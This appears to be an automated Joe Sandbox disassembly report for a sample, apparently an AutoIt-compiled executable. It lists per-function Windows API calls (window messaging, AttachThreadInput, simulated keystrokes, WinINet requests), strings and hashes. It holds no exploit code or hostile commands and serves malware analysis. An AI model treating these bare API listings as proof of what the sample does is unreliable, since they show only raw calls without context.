SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B33AA0
GetWindowLongW.USER32(?,000000F0), ref: 00B33AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B33AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B33B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B33BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B33BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B33BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B33BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B33C13

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
Instruction ID: 43550e28db9462a36894656565aa91c1de961f7cbab2e63db251fc4337638358
Opcode Fuzzy Hash: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
Instruction Fuzzy Hash: 9A616C75900248AFDB10DFA8CC81EEE77F8EB09700F204199FA15A72A1D774AE46DB60

Function 00B0B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B0B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B165
GetWindowThreadProcessId.USER32(00000000), ref: 00B0B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B21D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
Instruction ID: f828a6efe0b6224f8d315fdc93c481f9b003578d192e98e80f5bc796a1c6e80f
Opcode Fuzzy Hash: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
Instruction Fuzzy Hash: 6331BB75500204BFDB109F64DC99F6D7FE9FB61711F204444FA09E72A0DBB49A808F60

Function 00AD2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD2C94

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00AD2CA0
_free.LIBCMT ref: 00AD2CAB
_free.LIBCMT ref: 00AD2CB6
_free.LIBCMT ref: 00AD2CC1
_free.LIBCMT ref: 00AD2CCC
_free.LIBCMT ref: 00AD2CD7
_free.LIBCMT ref: 00AD2CE2
_free.LIBCMT ref: 00AD2CED
_free.LIBCMT ref: 00AD2CFB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
Instruction ID: 93f821a3d387b2fed8cd12f8de1afcb0d2c68ec430a16f332394738d3f068037
Opcode Fuzzy Hash: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
Instruction Fuzzy Hash: B311A476500108AFCB02EF54DA92EDD3BA5FF55350F4144A6FA4A9F322DA31EE50EB90

Function 00AA1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AA1459
OleUninitialize.OLE32(?,00000000), ref: 00AA14F8
UnregisterHotKey.USER32(?), ref: 00AA16DD
DestroyWindow.USER32(?), ref: 00AE24B9
FreeLibrary.KERNEL32(?), ref: 00AE251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE254B

Strings

close all, xrefs: 00AA1454

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 6016369ef6ed842d20706ac75e010f9170242f28d60ad73d14dd10e400992c02
Instruction ID: 5eaeedd0336d3ca2c26e45156f75d4377fb5a087b4768604f0b43b38e8bb9ac2
Opcode Fuzzy Hash: 6016369ef6ed842d20706ac75e010f9170242f28d60ad73d14dd10e400992c02
Instruction Fuzzy Hash: 65D1A031701212DFDB19EF55CA95B69F7A8BF06700F2542ADE44AAB292DB30ED12CF50

Function 00B17DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B17FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00B17FC1
GetFileAttributesW.KERNEL32(?), ref: 00B17FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B18005
SetCurrentDirectoryW.KERNEL32(?), ref: 00B18017
SetCurrentDirectoryW.KERNEL32(?), ref: 00B18060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B180B0

Strings

*.*, xrefs: 00B18066

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
Instruction ID: 8e4486b25b937188d30b5711701bae2e1aa679db66f5d046c74c4731e09fd2f9
Opcode Fuzzy Hash: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
Instruction Fuzzy Hash: FC8191725482459BCB20EF54C8849EEB7E8FF89310F9448AEF885D7250DF35DD858B92

Function 00AA5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00AA5C7A

Part of subcall function 00AA5D0A: GetClientRect.USER32(?,?), ref: 00AA5D30
Part of subcall function 00AA5D0A: GetWindowRect.USER32(?,?), ref: 00AA5D71
Part of subcall function 00AA5D0A: ScreenToClient.USER32(?,?), ref: 00AA5D99

GetDC.USER32 ref: 00AE46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AE4708
SelectObject.GDI32(00000000,00000000), ref: 00AE4716
SelectObject.GDI32(00000000,00000000), ref: 00AE472B
ReleaseDC.USER32(?,00000000), ref: 00AE4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AE47C4

Strings

U, xrefs: 00AE4693

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
Instruction ID: 89d5d0fbada04375cd68a8fc7fe77692dd1687571eca60d8b70602d4d8073464
Opcode Fuzzy Hash: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
Instruction Fuzzy Hash: 1B71F330800245DFCF218F69C984ABA7BB9FF4E360F244269ED555B1AAC7318C81DFA0

Function 00B1359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B135E4

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

LoadStringW.USER32(00B72390,?,00000FFF,?), ref: 00B1360A

Strings

Error: , xrefs: 00B136EF
"%s" (%d) : ==> %s:, xrefs: 00B13742
Line %d (File "%s"):, xrefs: 00B1366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00B13724
^ ERROR, xrefs: 00B136C9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: c794937b338613d6376a57a1860ecec2631e836478737f0e2793fae5eb6baab0
Instruction ID: f26487777b1d8bdf11e09a851b55d9fd3c5a3f5355255d67c10a6794628414e5
Opcode Fuzzy Hash: c794937b338613d6376a57a1860ecec2631e836478737f0e2793fae5eb6baab0
Instruction Fuzzy Hash: BB515C72800219BADF15EBA0CD42EEEBBB8EF15740F5441A5F105731E2EB311A99DFA1

Function 00B38B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00B38B6B
ImageList_EndDrag.COMCTL32 ref: 00B38B71
ReleaseCapture.USER32 ref: 00B38B77
SetWindowTextW.USER32(?,00000000), ref: 00B38C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B38C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00B38CFF

Strings

@GUI_DROPID, xrefs: 00B38C51
@GUI_DRAGFILE, xrefs: 00B38C9A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 0eed6fe36b1addea998caca2f1444c887c392d2ae582ad7f815bed71250f212d
Instruction ID: d425e0d210f15a883bf9f6cfabeae05e8c6ad4c83ea16863b527bf02a15b183c
Opcode Fuzzy Hash: 0eed6fe36b1addea998caca2f1444c887c392d2ae582ad7f815bed71250f212d
Instruction Fuzzy Hash: 42518B71104300AFD704DF18DD56FAE77E4FB88714F500A69F956672E1CB70A945CB62

Function 00B1C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C2CA
GetLastError.KERNEL32 ref: 00B1C322
SetEvent.KERNEL32(?), ref: 00B1C336
InternetCloseHandle.WININET(00000000), ref: 00B1C341

Strings

, xrefs: 00B1C2BB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
Instruction ID: 8271e2d11ca4e858e3f9677198af3a5510d3cc52218806498244ae4f6589daf9
Opcode Fuzzy Hash: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
Instruction Fuzzy Hash: EE317FB1540204AFD7219FA59C88AEF7FFCEB49744B50855DF456E3200DB30DD849B65

Function 00B0989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AE3AAF,?,?,Bad directive syntax error,00B3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B098BC
LoadStringW.USER32(00000000,?,00AE3AAF,?), ref: 00B098C3

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B09987

Strings

., xrefs: 00B0996D
Line %d:, xrefs: 00B09912
Error: , xrefs: 00B09955
Line %d (File "%s"):, xrefs: 00B0992D
%s (%d) : ==> %s.: %s %s, xrefs: 00B098F1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
Instruction ID: 1c968eb40666d058885000ce93ef3a7ea129c8083ef5a64f8b69b58a4f325e8f
Opcode Fuzzy Hash: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
Instruction Fuzzy Hash: E921603280021AAFCF16AF90CD06EEE7BB9FF19700F044495F515660E2EF759A18DB61

Function 00B0209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B020AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00B020C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B0214D

Strings

list, xrefs: 00B0212F
details, xrefs: 00B020FB
largeicons, xrefs: 00B020E1
SHELLDLL_DefView, xrefs: 00B020CC
smallicons, xrefs: 00B02115

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
Instruction ID: 29d072581c973372328c6f2fc84c4f58d75490a84719efb22cdb2cf338e03dc9
Opcode Fuzzy Hash: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
Instruction Fuzzy Hash: CA112976688706B9FA252720DC0FDEA7BDCCF09364F21019AFB04B60E1FE65685A5618

Function 00ADCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00ADCEB7
_free.LIBCMT ref: 00ADCF22
_free.LIBCMT ref: 00ADCF48
_free.LIBCMT ref: 00ADCF71
_free.LIBCMT ref: 00ADCFA9
_free.LIBCMT ref: 00ADCFDA
_free.LIBCMT ref: 00ADD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00ADD09C
_free.LIBCMT ref: 00ADD0B5

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 55c049977c8da644a979f64435ea151abcba12bcc1183f7fbc447e6a38053616
Instruction ID: c1044a71d68c50fcbd8b425dfc202f34a0888417eaabe110925f0339e5881e3b
Opcode Fuzzy Hash: 55c049977c8da644a979f64435ea151abcba12bcc1183f7fbc447e6a38053616
Instruction Fuzzy Hash: 2F6147B1904302AFDB21AFB8D985BAD7BA5EF09320F44416FF947A7381EA319D41D790

Function 00AB8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AF6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AF68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AF68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AF68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AF68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AF691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF692D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
Instruction ID: a9cfc17c914954bad923e38aad6c388bceaf9df52a48cc5f8c0ac9eea5d5df33
Opcode Fuzzy Hash: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
Instruction Fuzzy Hash: 29518870600209EFDB20CF68CC95FAE7BB9EF58750F204518FA16A72A0DB74E991DB50

Function 00B1C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C182
GetLastError.KERNEL32 ref: 00B1C195
SetEvent.KERNEL32(?), ref: 00B1C1A9

Part of subcall function 00B1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
Part of subcall function 00B1C253: GetLastError.KERNEL32 ref: 00B1C322
Part of subcall function 00B1C253: SetEvent.KERNEL32(?), ref: 00B1C336
Part of subcall function 00B1C253: InternetCloseHandle.WININET(00000000), ref: 00B1C341

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
Instruction ID: 6f1c422700dedc276d741c4945e671b3bb179b2b3703f69317886cc090fb1eb1
Opcode Fuzzy Hash: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
Instruction Fuzzy Hash: 0F317A71280601EFDB219FE5DC48AAABFF9FF18300B50445DF95A93610DB30E9949BA0

Function 00B025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B025DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B025DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B02601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B02605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B0260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B02623
